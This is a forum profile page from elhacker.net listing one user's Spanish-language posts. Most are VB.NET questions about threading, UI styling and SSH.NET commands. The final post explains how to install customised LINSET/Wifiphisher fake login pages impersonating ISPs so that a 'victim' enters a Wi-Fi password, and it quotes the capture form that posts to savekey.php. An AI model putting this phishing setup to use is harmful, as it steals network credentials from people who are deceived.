elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 141
11  Programación / .NET (C#, VB.NET, ASP) / Resultado de busqueda de google en listview? vb.net en: 21 Julio 2016, 20:38 pm
Algo un poco extraño pero estaba buscando la manera de pasar los datos de una búsqueda de google a un listview, alguna idea?
12  Programación / .NET (C#, VB.NET, ASP) / Re: Evitar se congele el formulario al hacer un for en: 14 Mayo 2016, 22:00 pm
probe pero me da:

Código:
An exception of type 'System.InvalidOperationException' occurred in AutoLog.exe but was not handled in user code

Additional information: Error al crear el formulario. Consulte Exception.InnerException para obtener más detalles. Error: No se puede crear una instancia del control ActiveX '8856f961-340a-11d0-a96b-00c04fd705a2' porque el subproceso actual no está en un contenedor uniproceso.

En delphi no pasaba esto..  :-( jajaja
13  Programación / .NET (C#, VB.NET, ASP) / Re: Evitar se congele el formulario al hacer un for en: 14 Mayo 2016, 07:04 am
Haber si entendi, usar el BackgroundWorker y cuando se haga el for en vez de mandarle el codigo, llamar a un función:

Código
  1.    Private Sub BackgroundWorker1_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles hiloSegundoPlano.DoWork
  2.        Dim worker As BackgroundWorker = CType(sender, BackgroundWorker)
  3.        Call  PasarList2aList1()
  4.    End Sub
  5.  
  6.    Function PasarList2aList1(ByVal n As Integer,ByVal worker As BackgroundWorker,ByVal e As DoWorkEventArgs) As Long
  7.        For i = 0 To ListView2.Items.Count - 1
  8.            Dim oreg As New ListViewItem
  9.            Threading.Thread.Sleep("2000")
  10.            oreg = Me.ListView1.Items.Add(ListView2.Items(i).Text)
  11.        Next
  12.        Return
  13.    End Function
14  Programación / .NET (C#, VB.NET, ASP) / Re: Evitar se congele el formulario al hacer un for en: 14 Mayo 2016, 06:27 am
Probe con el BackgroundWorker pero me da error al querer completar un listview que esta fuera del proceso:

Código
  1. Me.ListView1.Items.Add("Test LOG")

Error:

Código
  1. An exception of type 'System.InvalidOperationException' occurred in System.Windows.Forms.dll but was not handled in user code
  2. Additional information: Operación no válida a través de subprocesos: Se tuvo acceso al control 'ListView1' desde un subproceso distinto a aquel en que lo creó.
15  Programación / .NET (C#, VB.NET, ASP) / Evitar se congele el formulario al hacer un for en: 14 Mayo 2016, 05:04 am
Tengo un formulario con un listview y un boton, el botón realiza un proceso con cada item de la lista mediante un for, tengo otro listview que es un log, que cada vez que se ejecuta una linea se envía un aviso al log (se agrega un item a listview log), el problema esta en que este for congela al formulario mientras realiza el proceso, una vez que termina, muestra todo el log y se cumplieron todos los procesos pero necesitaría que el mismo no se congele, ya que el usuario tiene que estar pendiente del log para saber si esta funcionando correctamente o no.

Probe con colocar el log en otro formulario y antes de realizar el for abrir dicho formulario para que este quede activo, pero igual se congela tanto el primero como el segundo.

Alguna idea?
16  Programación / .NET (C#, VB.NET, ASP) / Re: Form se ve como Windows XP en Windows 10 en: 29 Abril 2016, 14:23 pm
jajaja  ;D

en las propiedades del proyecto tilde: Enable application framework y ahora se visualiza como el windows 10  :D
17  Programación / .NET (C#, VB.NET, ASP) / Form se ve como Windows XP en Windows 10 en: 28 Abril 2016, 23:30 pm
Tengo un viejo proyecto que pase al nuevo Visual Studio 2015, el tema esta en que el Form se ve como si lo ejecutara en el XP y no como el Windows 10, alguien sabe como modernizarlo?
18  Programación / .NET (C#, VB.NET, ASP) / Conexión con SSH con SSH-KEY Automatica en: 26 Abril 2016, 16:17 pm
Muy buenas foro, estoy intentando conectarme a un server con ssh, trabajando en visual basic 2015, probe con la DLL que se llama SSH.NET https://www.nuget.org/packages/SSH.NET/2014.4.6-beta2, funciona se conecta y todo y puedo obtener información del dispositivo, pero cuando envió un comando por ejemplo para editar un archivo y guardarlo (sed), nada no me da respuesta alguna, envió un reboot y obtengo que funciona el comando, por ende la conexión esta bien y se pueden enviar simples comandos pero nada elaborado, por ende busque mas opciones, probé con plink.exe y tengo el problema de la ssh-key y por mas que envio el comando "Echo Y | plink.exe " funciona la primera vez, después se cuelga. Probé cambien con WinSCP, nada.

Si alguien tiene una data de como hacerlo se los agradecería.



En el caso de SSH.NET el código es:

Código
  1.    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  2.        Me.Cursor = Cursors.WaitCursor
  3.        'Create the objects needed to make the connection'
  4.        Dim sshConnectionInfo As New Renci.SshNet.PasswordConnectionInfo(SERVER, USER, PASS)
  5.        Dim sshClient As New Renci.SshNet.SshClient(sshConnectionInfo)
  6.  
  7.        'Need to hold the command'
  8.        Dim cmd As Renci.SshNet.SshCommand
  9.  
  10.        Using sshClient
  11.            'connect to the server'
  12.            sshClient.Connect()
  13.  
  14.            If sshClient.IsConnected Then
  15.  
  16.                'si esta conectado
  17.                'Run the command'
  18.  
  19.                cmd = sshClient.RunCommand("y")
  20.  
  21.                Threading.Thread.Sleep(2000)
  22.  
  23.                cmd = sshClient.RunCommand("sed -i 's/VARS=.*/VARS=12/g' /tmp/dataconf.cfg #")
  24.  
  25.                Threading.Thread.Sleep(2000)
  26.  
  27.                cmd = sshClient.RunCommand("save #")
  28.  
  29.                Threading.Thread.Sleep(2000)
  30.  
  31.                cmd = sshClient.RunCommand("reboot #")
  32.  
  33.                Me.Cursor = Cursors.Default
  34.  
  35.            Else
  36.                'NO ESTA CONECTADO
  37.            End If
  38.        End Using
  39.    End Sub

Se que el comando reboot funciona, los anteriores no se ven cambios.
19  Programación / Scripting / Enviar " con SendKeys en VBS en: 26 Enero 2016, 14:39 pm
Estoy realizando un autologin con SendKeys para SSH, ya el loging lo tengo completo, el problema esta en que debo enviar unos parámetros con el caracter " ejemplo:

Código:
echo "echo '<option value=\"opcion1\" selected>Opcion1</option>' >> /etc/opts.inc" > /etc/persistent/opts.it

intente con { " } y nada. Alguna idea?
20  Seguridad Informática / Hacking Wireless / Re: Agregar foto a html de LINSET en: 25 Diciembre 2015, 21:46 pm
Acá te dejo un mod hecho para Telmex, bastante atractivo, y otro que son las interfaces de Wifipisher, las cuales extraje por su carácter "minimalista" y que quizás puedas usar de ejemplo para adaptarlas o de idea base.

Podes reemplazar y añadir los archivos correspondientes en la carpeta tmp que crea linset luego de crear el fake web y darle permisos (+x) para que la victima al acceder vea el interface cambiado o bien, para ahorrarte eso podes correr el *.sh que esta adjunto a la interface y se encargara de montarla por defecto.

Luego, cuando tenga un poco más de tiempo subiré mi adaptación para Fibertel y otro genérico para cualquier otro operador.

* Los enlaces:
- Telmex MOD Linset
- Wifipisher Interfaces
- Fibertel Argentina

Por lo que vi del código, lo único importante es:

Código:
<form action="data/savekey.php" method="POST" id="datos-ma">
                        <input type="password" maxlength="63" name="key1" id="llave-ma">
                        <button type="button" onclick="initUpdateMA()">Enviar</button>
                    </form>

Más info: http://goo.gl/RmvZ6w
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 141
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines